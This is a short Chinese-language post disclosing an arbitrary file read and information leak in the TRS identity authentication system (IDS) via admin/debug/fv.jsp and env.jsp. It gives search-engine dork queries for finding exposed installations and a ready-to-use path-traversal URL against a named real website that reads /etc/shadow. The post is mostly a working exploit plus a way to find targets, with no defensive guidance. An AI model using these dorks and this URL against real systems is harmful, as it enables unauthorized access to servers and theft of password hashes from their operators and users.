TRS身份认证系统任意文件读取漏洞+信息泄露

trs ids 系统存在任意文件读取和信息泄露漏洞

具体文件路径在admin/debug/目录下,读取文件为fv.jsp,信息泄露为env.jsp等

google

http://203.208.46.145/#newwindow=1&q=intitle:trs身份&start=60

http://203.208.46.145/#newwindow=1&q=intitle:trs+inurl:ids&start=20

baidu

http://www.baidu.com/s?tn=baiduhome_pg&ie=utf-8&bs=intitle%3Atrs+ids&f=8&rsv_bp=1&rsv_spt=1&wd=intitle%3Atrs+ids+inurl%3Aids&rsv_sug3=8&rsv_sug4=369&rsv_sug1=4&inputT=2568

只要变换下关键字就能获取到更多使用ids的系统

http://ids.people.com.cn/ids/admin/debug/fv.jsp?f=/../../../../../../../../etc/shadow

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录